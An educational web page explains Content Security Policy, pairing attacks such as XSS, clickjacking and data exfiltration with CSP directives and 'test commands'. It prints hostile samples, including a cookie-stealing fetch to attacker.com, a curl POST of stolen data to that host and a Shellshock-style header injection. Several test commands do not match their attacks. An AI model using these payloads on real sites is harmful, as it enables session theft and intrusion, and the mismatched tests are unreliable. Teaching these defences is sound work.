Content Security Policy (CSP) Explanation
What is Content Security Policy?
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware.
CSP is implemented by setting a Content-Security-Policy HTTP header that allows you to declare approved sources of content that the browser should be allowed to load on that page.
Why is CSP Important?
- Mitigates XSS attacks by specifying which scripts can be executed
- Prevents unauthorized resource loading from malicious sources
- Helps protect against clickjacking attacks
- Provides detailed violation reports for monitoring and improving security
CSP Examples
CSP Attack Examples and Mitigations
Understanding common attack vectors and how CSP can mitigate them is crucial for implementing effective security measures. Here are some key attack types and how CSP helps prevent them:
Cross-Site Scripting (XSS)
An attacker injects malicious scripts into a trusted website, which are then executed in the user's browser.
Attack Example:
<script>alert('XSS');</script>CSP Mitigation:
script-src 'self'; object-src 'none';Test Command:
curl -H "User-Agent: () { :; }; /bin/eject" http://vulnerable-site.comClickjacking
An attacker tricks a user into clicking on something different from what the user perceives, potentially causing unwanted actions.
Attack Example:
<iframe src='https://vulnerable-site.com' style='opacity:0;position:absolute;'></iframe>CSP Mitigation:
frame-ancestors 'none';Test Command:
curl -I -X GET http://vulnerable-site.com | grep X-Frame-OptionsData Exfiltration
An attacker uses a compromised script to send sensitive data to their server without the user's knowledge.
Attack Example:
<script>fetch('https://attacker.com/steal', { method: 'POST', body: document.cookie });</script>CSP Mitigation:
connect-src 'self';Test Command:
curl -X POST -H "Content-Type: application/json" -d '{"stolen_data":"sensitive_info"}' https://attacker.com/stealMalicious Plugin
An attacker tricks the user into installing a browser plugin that can bypass CSP and other security measures.
Attack Example:
// Malicious plugin code that modifies CSP headersCSP Mitigation:
plugin-types application/pdf; object-src 'none';Test Command:
curl -I -X GET http://vulnerable-site.com | grep Content-Security-PolicyDOM-based XSS
An attacker exploits client-side scripts to inject malicious content into the Document Object Model (DOM).
Attack Example:
location.hash.substring(1) -> element.innerHTMLCSP Mitigation:
script-src 'self'; object-src 'none'; base-uri 'self';Test Command:
curl 'http://vulnerable-site.com/#<img src=x onerror=alert(1)>'CSS Injection
An attacker injects malicious CSS to exfiltrate data or modify the page appearance, potentially leading to phishing attacks.
Attack Example:
<link rel="stylesheet" href="https://attacker.com/malicious.css">CSP Mitigation:
style-src 'self';Test Command:
curl -H "User-Agent: <style>@import 'https://attacker.com/malicious.css';</style>" http://vulnerable-site.comInteractive CSP Builder
Interactive CSP Builder
Create and customize your Content Security Policy
Generated CSP Header:
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'; img-src 'self'; connect-src 'self'; font-src 'self'; object-src 'none'; media-src 'self'; frame-src 'self'; worker-src 'self'; manifest-src 'self'; form-action 'self'CSP Tester
CSP Tester
Test the Content Security Policy of any website
Implementing CSP
- Identify the resources your site needs to load
- Create a policy that allows only these required resources
- Add the Content-Security-Policy header to your server configuration
- Test your policy using the Content-Security-Policy-Report-Only header
- Monitor for any CSP violations and refine your policy as needed
CSP Best Practices
- Start with a minimal CSP and gradually expand it as you understand your resource needs
- Use CSP nonces or hashes for inline scripts instead of 'unsafe-inline'
- Regularly review and update your CSP to accommodate new features and third-party integrations
- Use the 'report-uri' directive to monitor CSP violations and adjust your policy accordingly